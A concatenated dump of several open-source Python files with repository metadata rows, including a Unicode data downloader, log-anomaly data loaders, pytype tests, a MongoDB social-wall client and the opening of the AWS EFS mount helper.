print('Zipping %s.zip...' % version)
for root, dirs, files in os.walk(target):
for file in files:
if file.endswith('.txt'):
zipper.write(os.path.join(root, file), arcname=file)
def unzip_unicode(output, version):
"""Unzip the Unicode files."""
unzipper = zipfile.ZipFile(os.path.join(output, 'unicodedata', '%s.zip' % version))
target = os.path.join(output, 'unicodedata', version)
print('Unzipping %s.zip...' % version)
os.makedirs(target)
for f in unzipper.namelist():
# Do I need backslash on windows? Or is it forward as well?
unzipper.extract(f, target)
def download_unicodedata(version, output=HOME, no_zip=False):
"""Download Unicode data scripts and blocks."""
ver = tuple([int(x) for x in version.split('.')])
files = [
'UnicodeData.txt',
'Scripts.txt',
'Blocks.txt',
'PropList.txt',
'DerivedCoreProperties.txt',
'DerivedNormalizationProps.txt',
'CompositionExclusions.txt',
'PropertyValueAliases.txt',
'PropertyAliases.txt',
'EastAsianWidth.txt',
'LineBreak.txt',
'HangulSyllableType.txt',
'DerivedAge.txt',
'auxiliary/WordBreakProperty.txt',
'auxiliary/SentenceBreakProperty.txt',
'auxiliary/GraphemeBreakProperty.txt',
'extracted/DerivedDecompositionType.txt',
'extracted/DerivedNumericType.txt',
'extracted/DerivedNumericValues.txt',
'extracted/DerivedJoiningType.txt',
'extracted/DerivedJoiningGroup.txt',
'extracted/DerivedCombiningClass.txt',
'emoji/emoji-data.txt'
]
files.append('ScriptExtensions.txt')
files.append('IndicPositionalCategory.txt')
files.append('IndicSyllabicCategory.txt')
files.append('BidiBrackets.txt')
if ver >= (11, 0, 0):
files.append('VerticalOrientation.txt')
http_url = 'http://www.unicode.org/Public/%s/ucd/' % version
ftp_url = 'ftp://ftp.unicode.org/Public/%s/ucd/' % version
destination = os.path.join(output, 'unicodedata', version)
if not os.path.exists(destination):
os.makedirs(destination)
zip_data = not no_zip
for f in files:
file_location = os.path.join(destination, os.path.basename(f))
retrieved = False
if not os.path.exists(file_location):
for url in (ftp_url, http_url):
furl = url + f
try:
print('Downloading: %s --> %s' % (furl, file_location))
response = urlopen(furl, timeout=30)
data = response.read()
except Exception:
print('Failed: %s' % url)
continue
with codecs.open(file_location, 'w', encoding='utf-8') as uf:
uf.write(data.decode('utf-8'))
retrieved = True
break
if not retrieved:
print('Failed to acquire all needed Unicode files!')
break
else:
retrieved = True
print('Skipping: found %s' % file_location)
if not retrieved:
zip_data = False
break
if zip_data and not os.path.exists(os.path.join(output, 'unicodedata', '%s.zip' % version)):
zip_unicode(output, version)
def get_unicodedata(version, output=HOME, no_zip=False):
"""Ensure we have Unicode data to generate Unicode tables."""
target = os.path.join(output, 'unicodedata', version)
zip_target = os.path.join(output, 'unicodedata', '%s.zip' % version)
if not os.path.exists(target) and os.path.exists(zip_target):
unzip_unicode(output, version)
# Download missing files if any. Zip if required.
download_unicodedata(version, output, no_zip)
if __name__ == '__main__':
import argparse
import unicodedata
parser = argparse.ArgumentParser(prog='unidatadownload', description='Generate a unicode property table.')
parser.add_argument('--version', action='version', version="%(prog)s " + __version__)
parser.add_argument('--output', default=HOME, help='Output file.')
parser.add_argument('--unicode-version', default=None, help='Force a specific Unicode version.')
args = parser.parse_args()
if args.unicode_version is None:
version = unicodedata.unidata_version
else:
version = args.unicode_version
get_unicodedata(version, output=args.output)
| 32.927152 | 112 | 0.627715 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,600 | 0.321802 |
b9ffb7c6fff3e245dc8ea1ea786cc6f60c2d4cde | 2,427 | py | Python | generator/cache/cache.py | biarmic/OpenCache | bb9e110e434deb83900de328cc76b63901ba582f | [
"BSD-3-Clause"
] | 5 | 2021-09-15T18:29:49.000Z | 2022-03-26T04:41:01.000Z | generator/cache/cache.py | VLSIDA/OpenCache | 0e79bf353c68d57dcc49d78178b12fd0b468f19a | [
"BSD-3-Clause"
] | null | null | null | generator/cache/cache.py | VLSIDA/OpenCache | 0e79bf353c68d57dcc49d78178b12fd0b468f19a | [
"BSD-3-Clause"
] | null | null | null | # See LICENSE for licensing information.
#
# Copyright (c) 2021 Regents of the University of California and The Board
# of Regents for the Oklahoma Agricultural and Mechanical College
# (acting for and on behalf of Oklahoma State University)
# All rights reserved.
#
import debug
import datetime
from policy import associativity
from globals import OPTS, print_time
class cache:
"""
This is not a design module, but contains a cache design instance.
"""
def __init__(self, cache_config, name):
cache_config.set_local_config(self)
self.name = name
# Import the design module of the cache
if OPTS.associativity == associativity.DIRECT:
from direct_cache import direct_cache as cache
elif OPTS.associativity == associativity.N_WAY:
from n_way_cache import n_way_cache as cache
elif OPTS.associativity == associativity.FULLY:
# TODO: from full_cache import full_cache as cache
debug.error("Fully associative cache is not supported at the moment.", -1)
else:
debug.error("Invalid associativity.", -1)
self.c = cache(cache_config, name)
def config_write(self, paths):
""" Save the config files. """
self.c.config_write(paths)
def verilog_write(self, path):
""" Save the Verilog file. """
self.c.verilog_write(path)
def save(self):
""" Save all the output files. """
debug.print_raw("Saving output files...")
# Write the config files
start_time = datetime.datetime.now()
cpaths = {
"data": OPTS.output_path + OPTS.data_array_name + "_config.py",
"tag": OPTS.output_path + OPTS.tag_array_name + "_config.py",
"use": OPTS.output_path + OPTS.use_array_name + "_config.py"
}
if not OPTS.replacement_policy.has_sram_array(): del cpaths["use"]
for k, cpath in cpaths.items():
debug.print_raw("Config: Writing to {}".format(cpath))
self.config_write(cpaths)
print_time("Config", datetime.datetime.now(), start_time)
# Write the Verilog file
start_time = datetime.datetime.now()
vpath = OPTS.output_path + self.c.name + ".v"
debug.print_raw("Verilog: Writing to {}".format(vpath))
self.verilog_write(vpath)
print_time("Verilog", datetime.datetime.now(), start_time) | 33.246575 | 86 | 0.646477 | 2,059 | 0.848372 | 0 | 0 | 0 | 0 | 0 | 0 | 803 | 0.330861 |
b9ffed8a41299969ab07da01999635758df5ba4f | 11,469 | py | Python | utils/data_loader.py | elieser1101/loglizer | 985c5f582fbbe4d6365184086ac091134a5b5d07 | [
"MIT"
] | null | null | null | utils/data_loader.py | elieser1101/loglizer | 985c5f582fbbe4d6365184086ac091134a5b5d07 | [
"MIT"
] | null | null | null | utils/data_loader.py | elieser1101/loglizer | 985c5f582fbbe4d6365184086ac091134a5b5d07 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Shilin He'
import pandas as pd
import os
import numpy as np
def hdfs_data_loader(para):
""" load the log sequence matrix and labels from the file path.
Args:
--------
para: the parameters dictionary
Returns:
--------
raw_data: log sequences matrix
label_data: labels matrix
"""
file_path = para['path'] + para['log_seq_file_name']
label_path = para['path'] + para['label_file_name']
# load log sequence matrix
pre_df = pd.read_csv(file_path, nrows=1, header=None, delimiter=r'\s+')
columns = pre_df.columns.tolist()
# remove the last column of block name
use_cols = columns[:-1]
data_df = pd.read_csv(file_path, delimiter=r'\s+', header=None, usecols =use_cols, dtype =int)
raw_data = data_df.as_matrix()
# load lables
label_df = pd.read_csv(label_path, delimiter=r'\s+', header=None, usecols = [0], dtype =int) # usecols must be a list
label_data = label_df.as_matrix()
print("The raw data shape is {} and label shape is {}".format(raw_data.shape, label_data.shape))
assert raw_data.shape[0] == label_data.shape[0]
print('The number of anomaly instances is %d' % sum(label_data))
return raw_data, label_data
def bgl_data_loader(para):
""" load the logs and the log_event_mapping from the file path.
Args:
--------
para: the parameters dictionary
Returns:
--------
raw_data: list of (label, time)
event_mapping_data: a list of event index, where each row index indicates a corresponding log
"""
file_path = para['path'] + para['log_file_name']
event_mapping_path = para['path'] + para['log_event_mapping']
# load data
data_df = pd.read_csv(file_path, delimiter=r'\s+', header=None, names = ['label','time'], usecols = para['select_column']) #, parse_dates = [1], date_parser=dateparse)
# convert to date time format
data_df['time'] = pd.to_datetime(data_df['time'], format="%Y-%m-%d-%H.%M.%S.%f")
# calculate the time interval since the start time
data_df['seconds_since'] = (data_df['time']-data_df['time'][0]).dt.total_seconds().astype(int)
# get the label for each log
data_df['label'] = (data_df['label'] != '-').astype(int)
raw_data = data_df[['label','seconds_since']].as_matrix()
# load the event mapping list
event_mapping = pd.read_csv(event_mapping_path, delimiter=r'\s+', header=None, usecols = [0], dtype =int)
event_mapping_data = event_mapping.as_matrix()
print("The raw data shape is {} and label shape is {}".format(raw_data.shape, event_mapping_data.shape))
assert raw_data.shape[0] == event_mapping_data.shape[0]
print('The number of anomaly logs is %d, but it requires further processing' % sum(raw_data[:, 0]))
return raw_data, event_mapping_data
def bgl_preprocess_data(para, raw_data, event_mapping_data):
""" split logs into sliding windows, built an event count matrix and get the corresponding label
Args:
--------
para: the parameters dictionary
raw_data: list of (label, time)
event_mapping_data: a list of event index, where each row index indicates a corresponding log
Returns:
--------
event_count_matrix: event count matrix, where each row is an instance (log sequence vector)
labels: a list of labels, 1 represents anomaly
"""
# create the directory for saving the sliding windows (start_index, end_index), which can be directly loaded in future running
if not os.path.exists(para['save_path']):
os.mkdir(para['save_path'])
log_size = raw_data.shape[0]
sliding_file_path = para['save_path']+'sliding_'+str(para['window_size'])+'h_'+str(para['step_size'])+'h.csv'
#=================divide into sliding windows=============#
start_end_index_list = [] # list of tuples, tuple contains two number, which represent the start and end of sliding time window
label_data, time_data = raw_data[:,0], raw_data[:, 1]
if not os.path.exists(sliding_file_path):
# split into sliding window
start_time = time_data[0]
start_index = 0
end_index = 0
# get the first start, end index, end time
for cur_time in time_data:
if cur_time < start_time + para['window_size']*3600:
end_index += 1
end_time = cur_time
else:
start_end_pair=tuple((start_index,end_index))
start_end_index_list.append(start_end_pair)
break
# move the start and end index until next sliding window
while end_index < log_size:
start_time = start_time + para['step_size']*3600
end_time = end_time + para['step_size']*3600
for i in range(start_index,end_index):
if time_data[i] < start_time:
i+=1
else:
break
for j in range(end_index, log_size):
if time_data[j] < end_time:
j+=1
else:
break
start_index = i
end_index = j
start_end_pair = tuple((start_index, end_index))
start_end_index_list.append(start_end_pair)
inst_number = len(start_end_index_list)
print('there are %d instances (sliding windows) in this dataset\n'%inst_number)
np.savetxt(sliding_file_path,start_end_index_list,delimiter=',',fmt='%d')
else:
print('Loading start_end_index_list from file')
start_end_index_list = pd.read_csv(sliding_file_path, header=None).as_matrix()
inst_number = len(start_end_index_list)
print('there are %d instances (sliding windows) in this dataset' % inst_number)
# get all the log indexes in each time window by ranging from start_index to end_index
expanded_indexes_list=[]
for t in range(inst_number):
index_list = []
expanded_indexes_list.append(index_list)
for i in range(inst_number):
start_index = start_end_index_list[i][0]
end_index = start_end_index_list[i][1]
for l in range(start_index, end_index):
expanded_indexes_list[i].append(l)
event_mapping_data = [row[0] for row in event_mapping_data]
event_num = len(list(set(event_mapping_data)))
print('There are %d log events'%event_num)
#=================get labels and event count of each sliding window =============#
labels = []
event_count_matrix = np.zeros((inst_number,event_num))
for j in range(inst_number):
label = 0 #0 represent success, 1 represent failure
for k in expanded_indexes_list[j]:
event_index = event_mapping_data[k]
event_count_matrix[j, event_index] += 1
if label_data[k]:
label = 1
continue
labels.append(label)
assert inst_number == len(labels)
print("Among all instances, %d are anomalies"%sum(labels))
assert event_count_matrix.shape[0] == len(labels)
return event_count_matrix, labels
def deepia_data_loader(para):
""" load the logs and the log_event_mapping from the file path.
Args:
--------
para: the parameters dictionary
Returns:
--------
raw_data: list of (label, time)
event_mapping_data: a list of event index, where each row index indicates a corresponding log
"""
file_path = para['path'] + para['log_file_name']
event_mapping_path = para['path'] + para['log_event_mapping']
# load data
data_df = pd.read_csv(file_path, delimiter=r'\s+', header=None, names=['month', 'day', 'hour'],
usecols=para['select_column']) # , parse_dates = [1], date_parser=dateparse)
# convert to date time format
data_df = data_df[['month', 'day', 'hour']].apply(lambda x: list(map(str, x)))
data_df['time'] = data_df[['month', 'day', 'hour']].apply(lambda x: '-'.join(x), axis=1) #
data_df['time'] = pd.to_datetime(data_df['time'], format="%b-%d-%H:%M:%S")
# calculate the time interval since the start time
data_df['seconds_since'] = (data_df['time'] - data_df['time'][0]).dt.total_seconds().astype(int)
# get the label for each log
# data_df['label'] = (data_df['label'] != '-').astype(int)
raw_data = data_df[['seconds_since']].as_matrix()
# load the event mapping list
event_mapping = pd.read_csv(event_mapping_path, delimiter=r'\s+', header=None, usecols = [0], dtype =int)
event_mapping_data = event_mapping.as_matrix()
print("The raw data shape is {} and label shape is {}".format(raw_data.shape, event_mapping_data.shape))
assert raw_data.shape[0] == event_mapping_data.shape[0]
#print('The number of anomaly logs is %d, but it requires further processing' % sum(raw_data[:, 0]))
return raw_data, event_mapping_data
def deepia_preprocess_data(para, raw_data, event_mapping_data):
""" split logs into sliding windows, built an event count matrix and get the corresponding label
Args:
--------
para: the parameters dictionary
raw_data: list of (label, time)
event_mapping_data: a list of event index, where each row index indicates a corresponding log
Returns:
--------
event_count_matrix: event count matrix, where each row is an instance (log sequence vector)
labels: a list of labels, 1 represents anomaly
"""
# create the directory for saving the sliding windows (start_index, end_index), which can be directly loaded in future running
if not os.path.exists(para['save_path']):
os.mkdir(para['save_path'])
log_size = raw_data.shape[0]
sliding_file_path = para['save_path']+'sliding_'+str(para['window_size'])+'h_'+str(para['step_size'])+'h.csv'
#=================divide into sliding windows=============#
start_end_index_list = [] # list of tuples, tuple contains two number, which represent the start and end of sliding time window
time_data = raw_data[:,0]
if not os.path.exists(sliding_file_path):
# split into sliding window
start_time = time_data[0]
start_index = 0
end_index = 0
# get the first start, end index, end time
for cur_time in time_data:
if cur_time < start_time + para['window_size']*3600:
end_index += 1
end_time = cur_time
else:
start_end_pair=tuple((start_index,end_index))
start_end_index_list.append(start_end_pair)
break
# move the start and end index until next sliding window
while end_index < log_size:
start_time = start_time + para['step_size']*3600
end_time = end_time + para['step_size']*3600
for i in range(start_index,end_index):
if time_data[i] < start_time:
i+=1
else:
break
for j in range(end_index, log_size):
if time_data[j] < end_time:
j+=1
else:
break
start_index = i
end_index = j
start_end_pair = tuple((start_index, end_index))
start_end_index_list.append(start_end_pair)
inst_number = len(start_end_index_list)
print('there are %d instances (sliding windows) in this dataset\n'%inst_number)
np.savetxt(sliding_file_path,start_end_index_list,delimiter=',',fmt='%d')
else:
print('Loading start_end_index_list from file')
start_end_index_list = pd.read_csv(sliding_file_path, header=None).as_matrix()
inst_number = len(start_end_index_list)
print('there are %d instances (sliding windows) in this dataset' % inst_number)
# get all the log indexes in each time window by ranging from start_index to end_index
expanded_indexes_list=[]
for t in range(inst_number):
index_list = []
expanded_indexes_list.append(index_list)
for i in range(inst_number):
start_index = start_end_index_list[i][0]
end_index = start_end_index_list[i][1]
for l in range(start_index, end_index):
expanded_indexes_list[i].append(l)
event_mapping_data = [row[0] for row in event_mapping_data]
event_num = len(list(set(event_mapping_data)))
print('There are %d log events'%event_num)
#=================get labels and event count of each sliding window =============#
event_count_matrix = np.zeros((inst_number,event_num))
for j in range(inst_number):
for k in expanded_indexes_list[j]:
event_index = event_mapping_data[k]
event_count_matrix[j, event_index] += 1
#print("Among all instances, %d are anomalies"%sum(labels))
return event_count_matrix
| 38.877966 | 168 | 0.717674 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,932 | 0.430029 |
6a00c6e63b457a75c0424a247757123821cb24fb | 1,230 | py | Python | aspx2url/aspx2url.py | marcocucinato/aspx2url | 985a0e51865bb7be15618155ff9844730c2eaaf6 | [
"MIT"
] | null | null | null | aspx2url/aspx2url.py | marcocucinato/aspx2url | 985a0e51865bb7be15618155ff9844730c2eaaf6 | [
"MIT"
] | null | null | null | aspx2url/aspx2url.py | marcocucinato/aspx2url | 985a0e51865bb7be15618155ff9844730c2eaaf6 | [
"MIT"
] | null | null | null | from __future__ import print_function
import re, sys, glob, getopt, os
def usage():
print('aspx2url v1.0')
print('Usage:')
print(sys.argv[0]+' -d -h filename(s)')
print('-d : Delete original file')
print('-h : This help')
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "hd")
except getopt.GetoptError as err:
print(str(err))
usage()
sys.exit(2)
deleteOriginal = False
for option,value in opts:
if option == '-h':
usage()
sys.exit()
elif option == '-d':
deleteOriginal = True
for origFilename in args:
with open(origFilename, "r") as f:
html_doc = f.read()
            prog = re.compile(r'\<mso\:URL.*?\>(.*?),.*?\<\/mso\:URL\>', re.M)
            result = prog.search(html_doc)
            url = result.group(1)
            filename = re.search(r'(.*?)\.aspx', origFilename).group(1)
fullFilename = filename+'.url'
with open(fullFilename, 'w') as out:
out.write('[InternetShortcut]\n')
out.write('URL='+url)
out.write('\n')
if deleteOriginal:
os.remove(origFilename)
if __name__ == '__main__':
main()
| 29.285714 | 77 | 0.530081 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 205 | 0.166667 |
6a00d6b8c83e85268bd294d4e512d54f000cfc8a | 2,843 | py | Python | pytype/tests/py2/test_stdlib.py | souravbadami/pytype | 804fa97e7f9208df2711976085a96f756b3949e6 | [
"Apache-2.0"
] | 1 | 2020-04-20T02:55:21.000Z | 2020-04-20T02:55:21.000Z | pytype/tests/py2/test_stdlib.py | doc22940/pytype | 4772ad6fe89f4df75ae3d08e7374f68074175d4a | [
"Apache-2.0"
] | null | null | null | pytype/tests/py2/test_stdlib.py | doc22940/pytype | 4772ad6fe89f4df75ae3d08e7374f68074175d4a | [
"Apache-2.0"
] | null | null | null | """Tests of selected stdlib functions."""
from pytype.tests import test_base
class StdlibTests(test_base.TargetPython27FeatureTest):
"""Tests for files in typeshed/stdlib."""
def testPosix(self):
ty = self.Infer("""
import posix
x = posix.urandom(10)
""")
self.assertTypesMatchPytd(ty, """
posix = ... # type: module
x = ... # type: str
""")
def testXRange(self):
self.Check("""
import random
random.sample(xrange(10), 5)
""")
def testStringTypes(self):
ty = self.Infer("""
import types
if isinstance("", types.StringTypes):
x = 42
if isinstance(False, types.StringTypes):
y = 42
if isinstance(u"", types.StringTypes):
z = 42
""", deep=False)
self.assertTypesMatchPytd(ty, """
types = ... # type: module
x = ... # type: int
z = ... # type: int
""")
def testDefaultDict(self):
self.Check("""
import collections
import itertools
ids = collections.defaultdict(itertools.count(17).next)
""")
def testSysVersionInfoLt(self):
ty = self.Infer("""
import sys
if sys.version_info[0] < 3:
v = 42
else:
v = "hello world"
""")
self.assertTypesMatchPytd(ty, """
sys = ... # type: module
v = ... # type: int
""")
def testSysVersionInfoLe(self):
ty = self.Infer("""
import sys
if sys.version_info[0] <= 2:
v = 42
else:
v = "hello world"
""")
self.assertTypesMatchPytd(ty, """
sys = ... # type: module
v = ... # type: int
""")
def testSysVersionInfoEq(self):
ty = self.Infer("""
import sys
if sys.version_info[0] == 2:
v = 42
elif sys.version_info[0] == 3:
v = "hello world"
else:
v = None
""")
self.assertTypesMatchPytd(ty, """
sys = ... # type: module
v = ... # type: int
""")
def testSysVersionInfoGe(self):
ty = self.Infer("""
import sys
if sys.version_info[0] >= 3:
v = 42
else:
v = "hello world"
""")
self.assertTypesMatchPytd(ty, """
sys = ... # type: module
v = ... # type: str
""")
def testSysVersionInfoGt(self):
ty = self.Infer("""
import sys
if sys.version_info[0] > 2:
v = 42
else:
v = "hello world"
""")
self.assertTypesMatchPytd(ty, """
sys = ... # type: module
v = ... # type: str
""")
def testSysVersionInfoNamedAttribute(self):
ty = self.Infer("""
import sys
if sys.version_info.major == 2:
v = 42
else:
v = "hello world"
""")
self.assertTypesMatchPytd(ty, """
sys: module
v: int
""")
test_base.main(globals(), __name__ == "__main__")
| 21.869231 | 61 | 0.518115 | 2,710 | 0.953218 | 0 | 0 | 0 | 0 | 0 | 0 | 1,862 | 0.654942 |
6a00f01d33da6c470fd1f865044516a818d9c018 | 88 | py | Python | smmips/__init__.py | oicr-gsi/pysmmips | ccf209b13862a5533a11fbe02e80d3265ccef313 | [
"MIT"
] | null | null | null | smmips/__init__.py | oicr-gsi/pysmmips | ccf209b13862a5533a11fbe02e80d3265ccef313 | [
"MIT"
] | null | null | null | smmips/__init__.py | oicr-gsi/pysmmips | ccf209b13862a5533a11fbe02e80d3265ccef313 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Tue Oct 20 16:04:52 2020
@author: rjovelin
"""
| 11 | 35 | 0.579545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 85 | 0.965909 |
6a00f65f8d9c6385beccc2cbd3c37ef660b0dc52 | 6,343 | py | Python | tarentsocialwall/MongoDBClient.py | tarent/socialwall-backend | 2f09b8ccdd62a15daaa281d6ff568cb6ef749ab6 | [
"MIT"
] | null | null | null | tarentsocialwall/MongoDBClient.py | tarent/socialwall-backend | 2f09b8ccdd62a15daaa281d6ff568cb6ef749ab6 | [
"MIT"
] | null | null | null | tarentsocialwall/MongoDBClient.py | tarent/socialwall-backend | 2f09b8ccdd62a15daaa281d6ff568cb6ef749ab6 | [
"MIT"
] | 2 | 2019-08-06T14:14:44.000Z | 2019-08-06T14:21:19.000Z | import random
from datetime import datetime
from passlib.handlers.sha2_crypt import sha256_crypt
from pymongo import MongoClient
from pymongo.errors import ConnectionFailure
from tarentsocialwall.SocialPost import SocialPost
from tarentsocialwall.User import User
from tarentsocialwall.Util import Util
class MongoDBClient:
__instance = None
@staticmethod
def getInstance():
""" Static access method. """
if MongoDBClient.__instance == None:
MongoDBClient()
client = None
db = None
random_social_post_list = None
reset_counter = None
def __init__(self, uri):
# connect to MongoDB, change the << MONGODB URL >> to reflect your own connection string
self.client = MongoClient(uri)
self.db = self.client.socialPosts
try:
# The ismaster command is cheap and does not require auth.
self.client.admin.command('ismaster')
except ConnectionFailure:
print("Server not available")
        if MongoDBClient.__instance is not None:
raise Exception("This class is a singleton!")
else:
MongoDBClient.__instance = self
self.update_all_socialposts()
# write social_post into mongo
def write_social_post(self, social_post: SocialPost):
existing_dict = None
try:
existing_dict = self.db.socialPosts.find_one({'externalId': social_post.externalId})
except Exception as ex:
print(ex)
existing_dict = None
if existing_dict is None:
self.db.socialPosts.insert_one(social_post.__dict__)
else:
update_identifier = {'externalId': social_post.externalId, 'source': social_post.source}
self.db.socialPosts.replace_one(update_identifier, social_post.__dict__)
return 0
# read random social_post from list
def get_random_social_post(self) -> SocialPost:
if len(self.random_social_post_list) == 0:
return None
else:
if self.reset_counter >= len(self.random_social_post_list):
# when we went through all posts once we reset counter and shuffle list
# so we dont repeat the same circle of posts every time
self.reset_counter = 0
random.shuffle(self.random_social_post_list)
post = self.random_social_post_list[self.reset_counter]
self.reset_counter = self.reset_counter + 1
print(post)
if post is None:
return None
social_post = SocialPost()
social_post.set_dictionary(post)
return social_post
# read custom social_post from mongo
def get_custom_social_post(self):
doc = list(self.db.socialPosts.aggregate([{'$match': {'source': 'custom post'}}]))
print(list(doc))
if doc is None:
return None
social_post_list = []
for post in doc:
custom_post_item = SocialPost()
custom_post_item.set_dictionary(post)
social_post_list.append(custom_post_item)
return social_post_list
def delete_post(self, external_id):
removed = self.db.socialPosts.delete_one({'externalId': external_id})
print(removed)
def write_access_token(self, access_token, source):
        # query by source so read_access_token can find the document again, then upsert it
        existing_dict = self.db.storeAccessToken.find_one({'source': source})
        document = {'access_token': access_token, 'source': source}
        if existing_dict is None:
            self.db.storeAccessToken.insert_one(document)
        else:
            self.db.storeAccessToken.replace_one({'source': source}, document)
return 0
def read_access_token(self, source):
existing_dict = self.db.storeAccessToken.find_one({'source': source})
return existing_dict
def get_google_calendar_posts(self):
timestamp_var = datetime.utcnow().timestamp()
doc = list(self.db.socialPosts.aggregate([
{'$match': {'validFrom': {'$lte': timestamp_var},
'validTo': {'$gte': timestamp_var},
'source': 'Google calendar'}},
{'$sort': {'start': 1}}
]))
if doc is None:
return None
social_post_list = []
for post in doc:
custom_post_item = SocialPost()
custom_post_item.set_dictionary(post)
social_post_list.append(custom_post_item)
return social_post_list
def get_users(self):
users_db = list(self.db.socialwall_users.find())
if users_db is None:
return None
users = []
for item in users_db:
            if item['username'] != 'admin':
user = User()
user.set_dictionary(item)
users.append(user)
return users
def read_user(self, username):
return self.db.socialwall_users.find_one({'username': username})
def write_user(self, user: User):
username_dict = self.db.socialwall_users.find_one({'username': user.username})
if username_dict is None:
self.db.socialwall_users.insert_one(user.__dict__)
else:
update_identifier = {'username': user.username}
self.db.socialwall_users.replace_one(update_identifier, user.__dict__)
return 0
def delete_user(self, user: User):
self.db.socialwall_users.delete_one({'username': user['username']})
def init_admin(self):
random_string = Util.randomString()
user = User()
user.username = 'admin'
user.password = sha256_crypt.hash(random_string)
print("Admin password is '%s'" % random_string)
user.firstname = 'admin'
user.lastname = 'admin'
self.write_user(user)
#Get all valid social posts from db and shuffle them in random order
def update_all_socialposts(self):
timestamp = datetime.utcnow().timestamp()
self.random_social_post_list = list(self.db.socialPosts.aggregate(
[{'$match': {'validFrom': {'$lte': timestamp}, 'validTo': {'$gte': timestamp}}}]))
random.shuffle(self.random_social_post_list)
self.reset_counter = 0
| 33.036458 | 100 | 0.631405 | 6,035 | 0.951443 | 0 | 0 | 147 | 0.023175 | 0 | 0 | 894 | 0.140943 |
6a0102385be6299942545100e581de23300db9a4 | 76,697 | py | Python | src/mount_efs/__init__.py | Sodki/efs-utils | 493d9ea0dde93b560519b184219f6f71e32a8fcf | [
"MIT"
] | null | null | null | src/mount_efs/__init__.py | Sodki/efs-utils | 493d9ea0dde93b560519b184219f6f71e32a8fcf | [
"MIT"
] | null | null | null | src/mount_efs/__init__.py | Sodki/efs-utils | 493d9ea0dde93b560519b184219f6f71e32a8fcf | [
"MIT"
] | 12 | 2020-10-22T03:47:51.000Z | 2022-03-19T18:09:59.000Z | #!/usr/bin/env python
#
# Copyright 2017-2018 Amazon.com, Inc. and its affiliates. All Rights Reserved.
#
# Licensed under the MIT License. See the LICENSE accompanying this file
# for the specific language governing permissions and limitations under
# the License.
#
#
# Copy this script to /sbin/mount.efs and make sure it is executable.
#
# You will be able to mount an EFS file system by its short name, by adding it
# to /etc/fstab. The syntax of an fstab entry is:
#
# [Device] [Mount Point] [File System Type] [Options] [Dump] [Pass]
#
# Add an entry like this:
#
# fs-deadbeef /mount_point efs _netdev 0 0
#
# Using the 'efs' type will cause '/sbin/mount.efs' to be called by 'mount -a'
# for this file system. The '_netdev' option tells the init system that the
# 'efs' type is a networked file system type. This has been tested with systemd
# (Amazon Linux 2, CentOS 7, RHEL 7, Debian 9, and Ubuntu 16.04), and upstart
# (Amazon Linux 2017.09).
#
# Once there is an entry in fstab, the file system can be mounted with:
#
# sudo mount /mount_point
#
# The script will add recommended mount options, if not provided in fstab.
import base64
import errno
import hashlib
import hmac
import json
import logging
import os
import pwd
import random
import re
import socket
import subprocess
import sys
import threading
import time
from contextlib import contextmanager
from datetime import datetime, timedelta
from logging.handlers import RotatingFileHandler
try:
import ConfigParser
from ConfigParser import NoOptionError, NoSectionError
except ImportError:
from configparser import ConfigParser, NoOptionError, NoSectionError
try:
from urllib.parse import quote_plus
except ImportError:
from urllib import quote_plus
try:
from urllib2 import URLError, HTTPError, build_opener, urlopen, Request, HTTPHandler
from urllib import urlencode
except ImportError:
from urllib.request import urlopen, Request
from urllib.error import URLError, HTTPError
from urllib.parse import urlencode
try:
import botocore.session
from botocore.exceptions import ClientError, NoCredentialsError, EndpointConnectionError
BOTOCORE_PRESENT = True
except ImportError:
BOTOCORE_PRESENT = False
VERSION = '1.28.2'
SERVICE = 'elasticfilesystem'
CONFIG_FILE = '/etc/amazon/efs/efs-utils.conf'
CONFIG_SECTION = 'mount'
CLIENT_INFO_SECTION = 'client-info'
CLIENT_SOURCE_STR_LEN_LIMIT = 100
CLOUDWATCH_LOG_SECTION = 'cloudwatch-log'
DEFAULT_CLOUDWATCH_LOG_GROUP = '/aws/efs/utils'
DEFAULT_RETENTION_DAYS = 14
# Cloudwatchlog agent dict includes cloudwatchlog botocore client, cloudwatchlog group name, cloudwatchlog stream name
CLOUDWATCHLOG_AGENT = None
LOG_DIR = '/var/log/amazon/efs'
LOG_FILE = 'mount.log'
STATE_FILE_DIR = '/var/run/efs'
PRIVATE_KEY_FILE = '/etc/amazon/efs/privateKey.pem'
DATE_ONLY_FORMAT = '%Y%m%d'
SIGV4_DATETIME_FORMAT = '%Y%m%dT%H%M%SZ'
CERT_DATETIME_FORMAT = '%y%m%d%H%M%SZ'
AWS_CREDENTIALS_FILE = os.path.expanduser(os.path.join('~' + pwd.getpwuid(os.getuid()).pw_name, '.aws', 'credentials'))
AWS_CONFIG_FILE = os.path.expanduser(os.path.join('~' + pwd.getpwuid(os.getuid()).pw_name, '.aws', 'config'))
CA_CONFIG_BODY = """dir = %s
RANDFILE = $dir/database/.rand
[ ca ]
default_ca = local_ca
[ local_ca ]
database = $dir/database/index.txt
serial = $dir/database/serial
private_key = %s
cert = $dir/certificate.pem
new_certs_dir = $dir/certs
default_md = sha256
preserve = no
policy = efsPolicy
x509_extensions = v3_ca
[ efsPolicy ]
CN = supplied
[ req ]
prompt = no
distinguished_name = req_distinguished_name
[ req_distinguished_name ]
CN = %s
%s
%s
%s
"""
# SigV4 Auth
ALGORITHM = 'AWS4-HMAC-SHA256'
AWS4_REQUEST = 'aws4_request'
HTTP_REQUEST_METHOD = 'GET'
CANONICAL_URI = '/'
CANONICAL_HEADERS_DICT = {
'host': '%s'
}
CANONICAL_HEADERS = '\n'.join(['%s:%s' % (k, v) for k, v in sorted(CANONICAL_HEADERS_DICT.items())])
SIGNED_HEADERS = ';'.join(CANONICAL_HEADERS_DICT.keys())
REQUEST_PAYLOAD = ''
FS_ID_RE = re.compile('^(?P<fs_id>fs-[0-9a-f]+)$')
EFS_FQDN_RE = re.compile(r'^(?P<fs_id>fs-[0-9a-f]+)\.efs\.(?P<region>[a-z0-9-]+)\.(?P<dns_name_suffix>[a-z0-9.]+)$')
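# e.g. FS_ID_RE matches 'fs-deadbeef'; EFS_FQDN_RE matches 'fs-deadbeef.efs.us-east-1.amazonaws.com'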
AP_ID_RE = re.compile('^fsap-[0-9a-f]{17}$')
